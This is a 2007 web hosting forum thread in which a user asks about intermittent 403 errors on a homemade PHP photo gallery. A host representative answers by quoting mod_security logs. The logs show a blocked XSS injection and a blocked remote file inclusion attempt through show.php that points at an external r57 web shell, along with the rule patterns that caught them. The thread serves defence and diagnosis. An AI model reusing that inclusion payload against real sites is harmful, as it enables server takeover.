UK WEB HOSTING FORUM FOR DISCUSSION ON WEB HOSTING SERVICE AND SUPPORT
LINUX HOSTING WINDOWS HOSTING PACKAGES SHOPPING CART OSCOMMERCE ZEN CART AGORA
ECOMMERCE HOSTING ASP MSSQL FRONTPAGE HOSTING PHP MYSQL HOSTING DISCUSSION FORUM
CPANEL RESELLER HOSTING DEDICATED SERVER VPS HOSTING PLESK VIRTUOZZO
Quick Search
Your forum announcement here!

  UK Web Hosting | Dedicated Server Windows and Linux VPS Forum > Technical Support > cPanel Shared Hosting

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 20-07-2007, 10:35
new member
 
Join Date: Jul 2007
Posts: 4
Default Occasional 403 error

My website is http://www.cowjam.co.uk

I have a PHP/mysql photo hosting thing I knocked up. I upload photos into directories, then thumbnails are generated and stored in a database and a menu link with the directory name is created.

The trouble is I get sporadic outbreaks of 403 errors (and a 404 as I don't have a 403) at all stages, and I really don't understand how or why. I'm thinking there's something up with my code but I don't understand why I'd get a Forbidden, so can't really debug.
Reply With Quote
  #2 (permalink)  
Old 20-07-2007, 11:46
DPS Computing's Avatar
Premium Member
 
Join Date: Apr 2007
Location: Manchester, United Kingdom
Posts: 4,458
Send a message via ICQ to DPS Computing Send a message via AIM to DPS Computing Send a message via MSN to DPS Computing Send a message via Yahoo to DPS Computing Send a message via Skype™ to DPS Computing
Default

It may be due to the mod_security rules.

Have you contacted support about this issue?
__________________
David Smith
DPS Computing
http://www.dpscomputing.com (Computing, Reviews, News) - New site / new polls / new stories! With many more to follow!
NEW LAUNCH! http://djdavid.dpscomputing.com (My DJ Website)
NEW LAUNCH! http://davidsmith.dpscomputing.com (My Personal Website)
Reply With Quote
  #3 (permalink)  
Old 20-07-2007, 14:39
new member
 
Join Date: Jul 2007
Posts: 4
Default

Quote:
Originally Posted by DPS Computing View Post
It may be due to the mod_security rules.

Have you contacted support about this issue?
I haven't, no. I didn't want to in case it was my shonky code so I thought I'd ask in here in case anyone else is getting the same.
Reply With Quote
  #4 (permalink)  
Old 20-07-2007, 17:05
DPS Computing's Avatar
Premium Member
 
Join Date: Apr 2007
Location: Manchester, United Kingdom
Posts: 4,458
Send a message via ICQ to DPS Computing Send a message via AIM to DPS Computing Send a message via MSN to DPS Computing Send a message via Yahoo to DPS Computing Send a message via Skype™ to DPS Computing
Default

The only thing that should cause 403 errors is if permissions are wrong for the files / directories you are trying to access.

Have you checked the permissions on these directories? (where the images are uploaded / displayed from?)
__________________
David Smith
DPS Computing
http://www.dpscomputing.com (Computing, Reviews, News) - New site / new polls / new stories! With many more to follow!
NEW LAUNCH! http://djdavid.dpscomputing.com (My DJ Website)
NEW LAUNCH! http://davidsmith.dpscomputing.com (My Personal Website)
Reply With Quote
  #5 (permalink)  
Old 20-07-2007, 22:59
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,253
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

Hello Sam,

I was looking at error logs for your domain and following was what I found in the error logs :-

[Thu Jul 5 17:58:39 2007] [error] [client 24.243.134.17] mod_security: Access denied with redirect to [/]. Pattern match "<(.|\\\\n)+>" at REQUEST_URI [id "XSS_Check"] [severity "EMERGENCY"] [hostname "www.cowjam.co.uk"] [uri "/arct/alarmed.jpg\\"%20/><br><br><br><img%20src=\\"http://www.cowjam.co.uk/arct/hat.gif"]


[Sun Jul 8 03:09:47 2007] [error] [client 189.0.234.84] mod_security: Access denied with redirect to [/]. Pattern match "r57" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.cowjam.co.uk"] [uri "/show.php?cid=http://no.spam.ee/~tonu/phpshell/r57shell.txt?"]

Text highlighted by me in second message is something which shows vulnerability in code of show.php code as someone tried to upload a shell script on the server using your show.php script and mod_security blocked that query from getting executed.

You need to upgrade your photo gallery installation as it is highly insecure and disabling mod_security for your account will surely get your website hacked within a day.

Please contact our support team from http://support.eukhost.com and have them to upgrade your installation but don't disable mod_security at any cost.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 22:49.

 

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by Web Hosting 3.1.0
Copyright © 2001-2008, eUKhost.com. All rights reserved.

 
Site Map

knowledgebase articles

popular blog categories